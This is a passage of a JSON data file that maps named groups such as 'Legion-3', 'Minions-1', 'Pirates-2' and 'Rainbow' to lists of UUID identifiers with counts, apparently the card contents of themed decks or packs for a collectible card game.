"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "eac9c0ee-97a1-4c31-8a42-30408ef3a49c",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "a3ba79d6-7da0-46ba-a26a-dc484bdae41d",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Legion-3": [
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "b9d4b138-5edc-4c12-b526-5c258bc1555c",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "a3ba79d6-7da0-46ba-a26a-dc484bdae41d",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Legion-4": [
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "da1fb1a6-7f64-45a6-9fc0-a325b7600afa",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "46150e35-bcaf-4b53-871d-d1d9091a36ab",
"count": 1
},
{
"id": "5a129ff7-72f9-4171-902d-a1b49eebfb62",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "b9d4b138-5edc-4c12-b526-5c258bc1555c",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Lightning-1": [
{
"id": "5f2a959e-7c17-4226-afcb-bc0bb5a4492b",
"count": 1
},
{
"id": "b52a3f11-6d55-4492-9a2c-c128c09b3d77",
"count": 1
},
{
"id": "017f94bc-f7f0-4eed-9ca0-392872405f32",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 2
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "302ec5d2-ea36-415c-9aa6-808c88a17932",
"count": 1
},
{
"id": "d212e27a-d2e1-430d-86ff-1f7abaad46d4",
"count": 1
},
{
"id": "f65ea432-9ece-40bf-9cdc-95e01a85b78f",
"count": 1
},
{
"id": "ce711943-c1a1-43a0-8b89-8d169cfb8e06",
"count": 1
},
{
"id": "9223ac16-e6fc-4ba6-91d9-7ff27cc17271",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "73c6382b-ceff-4092-9ec3-328cefab440e",
"count": 7
}
],
"Lightning-2": [
{
"id": "d9b53218-804b-4992-9c93-a797dd6b2a04",
"count": 1
},
{
"id": "5f2a959e-7c17-4226-afcb-bc0bb5a4492b",
"count": 1
},
{
"id": "b52a3f11-6d55-4492-9a2c-c128c09b3d77",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 2
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "302ec5d2-ea36-415c-9aa6-808c88a17932",
"count": 1
},
{
"id": "b7cef88c-0ad6-47c4-b6c8-f989586aa635",
"count": 1
},
{
"id": "f65ea432-9ece-40bf-9cdc-95e01a85b78f",
"count": 1
},
{
"id": "2e14f36e-54b8-4019-bc85-0d9218c52ad2",
"count": 1
},
{
"id": "9223ac16-e6fc-4ba6-91d9-7ff27cc17271",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "73c6382b-ceff-4092-9ec3-328cefab440e",
"count": 7
}
],
"Liliana": [
{
"id": "6c0cc3d9-85f1-49ed-bf8a-81fc6c60bd2a",
"count": 1
},
{
"id": "850ccdcb-2cd7-4f27-aa9b-917a62a5e94d",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "abd4dbd9-982c-43cf-b14c-c3179427d5a1",
"count": 1
},
{
"id": "3dc48b87-62cb-48f6-8979-e6fb98717b52",
"count": 1
},
{
"id": "1945fc78-8aa4-46fb-9571-eaa1c4729e3d",
"count": 1
},
{
"id": "4e35a461-9a8e-4d08-b963-14c8b5237eec",
"count": 1
},
{
"id": "e329a3e2-6702-4758-8aac-c3017e77b619",
"count": 1
},
{
"id": "88531c36-2330-474b-9426-1e4dd0fe4e3e",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "ee181d58-fed1-4f6d-96a3-4bf057ddd36e",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "fa3b8665-31f2-4142-a076-54bccdaf5a15",
"count": 7
}
],
"Mill": [
{
"id": "ef04340d-284c-4e7b-afd7-444d21a6b382",
"count": 1
},
{
"id": "5b43bdc7-e49e-4848-9101-6cad2ecab4dc",
"count": 1
},
{
"id": "bad3313a-61ef-42c8-a092-390adb51e17e",
"count": 1
},
{
"id": "94975b02-f678-4442-9d1a-cf586aee8789",
"count": 1
},
{
"id": "559bdfd6-8baf-430d-a4c4-5acf81e58b62",
"count": 1
},
{
"id": "a5e3084c-c690-4cc7-9d79-42b1cde073ad",
"count": 1
},
{
"id": "cad50269-6e80-47ea-a027-fa274f904e86",
"count": 1
},
{
"id": "0a932a37-a1db-4df9-9b65-27ee7b46957d",
"count": 1
},
{
"id": "142944d5-1b11-4ec4-b6b4-b5c03e682cd3",
"count": 2
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "c26450d4-125f-423d-b074-3c959460c242",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "ed351e4f-7ee7-4e84-a69d-02b59cebd180",
"count": 7
}
],
"Minions-1": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "b70d445b-d3d6-4f7c-b9ea-bed6a26d4a2a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "d3ab1d6c-09a6-4f6a-9549-94b439a46680",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "29184c64-03f3-4a50-ac18-e34b6c89635e",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 7
}
],
"Minions-2": [
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "761f2f66-a43b-422e-94b7-3c068314b7ec",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "b70d445b-d3d6-4f7c-b9ea-bed6a26d4a2a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "fc676672-1aeb-420a-b909-5a3215cc2ca6",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 7
}
],
"Minions-3": [
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "761f2f66-a43b-422e-94b7-3c068314b7ec",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "a49b95d9-2b64-4f33-97b1-db350026aa95",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "05b2cc68-1d20-421f-9800-af0996071554",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 6
}
],
"Minions-4": [
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "0bcba8d3-725b-49f9-8281-eafac15208c5",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "d3ab1d6c-09a6-4f6a-9549-94b439a46680",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "29184c64-03f3-4a50-ac18-e34b6c89635e",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 7
}
],
"Minotaurs-1": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "8b8c80ea-7b29-4335-ba7b-3e51a5a104a9",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b6fef9f8-ff3e-4a3f-a3ff-4534ff0c3946",
"count": 1
},
{
"id": "cbd65150-a698-4f23-836c-5cd0fb153eb3",
"count": 1
},
{
"id": "274cdb39-1454-4c9b-acd8-4f762a48e71f",
"count": 1
},
{
"id": "d2c9ea25-7a5e-4b6d-b071-e929f6b652c4",
"count": 1
},
{
"id": "62584e4f-dac1-4d99-ac0a-6a2451603889",
"count": 1
},
{
"id": "064a6f1c-a058-4cc8-b467-5dbecb5eeb99",
"count": 1
},
{
"id": "be522ae8-9cf4-4c63-9a1c-0010d482c00a",
"count": 1
},
{
"id": "3d36724e-0669-43f9-9d10-f67562b8c6bc",
"count": 1
},
{
"id": "e64d51b3-20a2-4cc3-bd70-7f165940c157",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "99c3decf-4a32-45ff-b7f6-ea2d52387c89",
"count": 7
}
],
"Minotaurs-2": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "8b8c80ea-7b29-4335-ba7b-3e51a5a104a9",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b6fef9f8-ff3e-4a3f-a3ff-4534ff0c3946",
"count": 1
},
{
"id": "cbd65150-a698-4f23-836c-5cd0fb153eb3",
"count": 1
},
{
"id": "568a31c0-799b-48b6-a91c-95d176b22670",
"count": 1
},
{
"id": "274cdb39-1454-4c9b-acd8-4f762a48e71f",
"count": 1
},
{
"id": "62584e4f-dac1-4d99-ac0a-6a2451603889",
"count": 1
},
{
"id": "064a6f1c-a058-4cc8-b467-5dbecb5eeb99",
"count": 1
},
{
"id": "e854e6a3-8684-43fa-9560-ef4c3b62c935",
"count": 1
},
{
"id": "be522ae8-9cf4-4c63-9a1c-0010d482c00a",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "99c3decf-4a32-45ff-b7f6-ea2d52387c89",
"count": 7
}
],
"Phyrexian": [
{
"id": "e39498cd-9b44-4563-b0fd-9258a52a85b2",
"count": 1
},
{
"id": "a3f2e2e5-5ed2-4040-92ba-ad1ac13f03f6",
"count": 1
},
{
"id": "d0aa3726-038f-4522-a7bd-1877a4fef350",
"count": 1
},
{
"id": "edf4c9e1-eff6-4abc-ad4e-ffd7f1895d8d",
"count": 1
},
{
"id": "2c4497c0-6e0a-4645-b04e-454d8fe97f05",
"count": 1
},
{
"id": "66e19435-59e5-44d4-b26f-f140f8bcaeb0",
"count": 1
},
{
"id": "86eb76e0-11ed-4f89-a2f4-04bc67f3c94d",
"count": 1
},
{
"id": "8b207a4a-47d1-4905-81d3-455c59bfd7da",
"count": 1
},
{
"id": "e34fa15b-4559-4a8f-aa29-5c43eb4eeef9",
"count": 1
},
{
"id": "43296ce8-f055-4778-a187-363a642001e4",
"count": 1
},
{
"id": "fb0271e4-8ad1-4ad9-9b3e-7abf911f3059",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "00030770-5e99-4943-819d-8d807c24cc14",
"count": 7
}
],
"Pirates-1": [
{
"id": "a9b016d4-ddf6-47d6-b934-a0b979b60680",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "36056deb-a7f8-4bb3-9c51-890e96f41482",
"count": 1
},
{
"id": "f6db054e-8303-44c7-8c96-d031a8c85b34",
"count": 1
},
{
"id": "b3ea87f1-fbe2-4905-8a97-ceef9d3d0faf",
"count": 1
},
{
"id": "10c1e6ad-1227-4049-89bf-69ace48c3076",
"count": 1
},
{
"id": "3b591fef-21ca-4a3b-990b-d7897a405511",
"count": 1
},
{
"id": "c55c60dc-40ed-4a36-9daa-702f79ffe818",
"count": 1
},
{
"id": "1a6f256b-943e-4cfb-9fc9-d1ded68b5f97",
"count": 1
},
{
"id": "0f2c4e43-71b2-4483-ba54-4be1dcffcd5f",
"count": 1
},
{
"id": "ada68b91-3379-483e-93a0-b6c7c675c1dc",
"count": 1
},
{
"id": "b1ff526b-3822-4073-baab-8ea5f95daf91",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c8c61b0c-408a-4ba5-9a1c-5208b5f7f8d0",
"count": 7
}
],
"Pirates-2": [
{
"id": "a9b016d4-ddf6-47d6-b934-a0b979b60680",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "36056deb-a7f8-4bb3-9c51-890e96f41482",
"count": 1
},
{
"id": "f6db054e-8303-44c7-8c96-d031a8c85b34",
"count": 1
},
{
"id": "b3ea87f1-fbe2-4905-8a97-ceef9d3d0faf",
"count": 1
},
{
"id": "10c1e6ad-1227-4049-89bf-69ace48c3076",
"count": 1
},
{
"id": "3b591fef-21ca-4a3b-990b-d7897a405511",
"count": 1
},
{
"id": "1a6f256b-943e-4cfb-9fc9-d1ded68b5f97",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "04cf3030-dc92-45ab-9c26-f2e6aef67e56",
"count": 1
},
{
"id": "b1ff526b-3822-4073-baab-8ea5f95daf91",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c8c61b0c-408a-4ba5-9a1c-5208b5f7f8d0",
"count": 7
}
],
"Plus One-1": [
{
"id": "b9bd60d3-d2d3-4b69-bd08-04833ff2394e",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "7d5573f8-5fdd-4050-af2a-fbdec51e4f37",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "c8123d01-da65-4d03-9f23-3842fba5fc28",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Plus One-2": [
{
"id": "b9bd60d3-d2d3-4b69-bd08-04833ff2394e",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "7d5573f8-5fdd-4050-af2a-fbdec51e4f37",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "4a6971ad-cbb4-4f66-9bc4-b407c5805e85",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Plus One-3": [
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "b3a35e69-145f-4cb0-b7f1-0eac8638afbe",
"count": 1
},
{
"id": "3f6f2163-5e08-4465-9669-a5a176a2b810",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "eb7a443d-ab85-4c3e-9fd4-f84afcea2665",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Plus One-4": [
{
"id": "d8d851d8-d7d0-4b8a-b520-f3863b78bc66",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "3f6f2163-5e08-4465-9669-a5a176a2b810",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "f10c622c-03ed-492d-baf9-6412cf5e50f4",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "4a6971ad-cbb4-4f66-9bc4-b407c5805e85",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Predatory-1": [
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "0c1eed0f-9692-44c0-b1ad-afa691165d52",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "6dbe1270-7300-4408-a4c8-92157a8a076f",
"count": 1
},
{
"id": "16482e12-7a8d-4999-8438-da227e6d1305",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "49d8aa8a-3e87-42ac-9c79-2baec771c1ef",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Predatory-2": [
{
"id": "05f13bda-9157-437d-b58b-20d34d03fc49",
"count": 1
},
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "c1195ec5-979b-4c4a-9c04-62bb53c2b011",
"count": 1
},
{
"id": "0c1eed0f-9692-44c0-b1ad-afa691165d52",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "49d8aa8a-3e87-42ac-9c79-2baec771c1ef",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Predatory-3": [
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "c1195ec5-979b-4c4a-9c04-62bb53c2b011",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "6dbe1270-7300-4408-a4c8-92157a8a076f",
"count": 1
},
{
"id": "d0594c41-0361-4a3b-a9cd-60f4e3b0cffe",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "49d8aa8a-3e87-42ac-9c79-2baec771c1ef",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Predatory-4": [
{
"id": "05f13bda-9157-437d-b58b-20d34d03fc49",
"count": 1
},
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "2f48df6c-8d5d-4d8a-b98a-793f6a56184d",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "16482e12-7a8d-4999-8438-da227e6d1305",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "91a6f558-a754-4437-8328-00a6ca47f9b5",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Rainbow": [
{
"id": "e8d2180b-f54c-47a9-9458-28e7a19e35ee",
"count": 1
},
{
"id": "b3260793-bf43-4862-9e1f-122edfc35ee4",
"count": 1
},
{
"id": "7da93bf0-2075-4e36-b69b-3db3d4288e7a",
"count": 1
},
{
"id": "5538bc51-e320-437e-867d-0d01621e31fb",
"count": 1
},
{
"id": "b78765aa-f952-47f5-b6fc-8aca93fc4104",
"count": 1
},
{
"id": "ed111116-c2cc-4c97-a84c-f9576ea2ada7",
"count": 1
},
{
"id": "eedce8ab-771a-4247-9504-72ae0629df83",
"count": 1
},
{
"id": "0c1632bd-30bc-40a2-963f-44be3b42efb3",
"count": 1
},
{
"id": "b8e9f488-db24-4bcd-bdf9-38c1e50f5504",
"count": 1
},
{
"id": "05f0092a-b642-41be-a907-4c8931962ef9",
"count": 1
},
{
"id": "c64771e8-94bb-452b-b028-619ed3b4327c",
"count": 1
},
{
"id": "a6f25660-97ec-4308-bc5b-1ee405b23399",
"count": 1
},
{
"id": "c0a9fbb3-9fe4-4ec6-82f0-3bb101524e1e",
"count": 1
},
{
"id": "8a2c2fea-d657-49f1-af03-d5d3fef3ead0",
"count": 1
},
{
"id": "637ab0de-6691-4a45-95ac-9b75721c6c5a",
"count": 1
},
{
"id": "4be96696-aff8-4ef9-97dc-8221ef745de9",
"count": 1
},
{
"id": "fc9a66a1-367c-4035-a22e-00fab55be5a0",
"count": 1
},
{
"id": "30b3d647-3546-4ade-b395-f2370750a7a6",
"count": 1
},
{
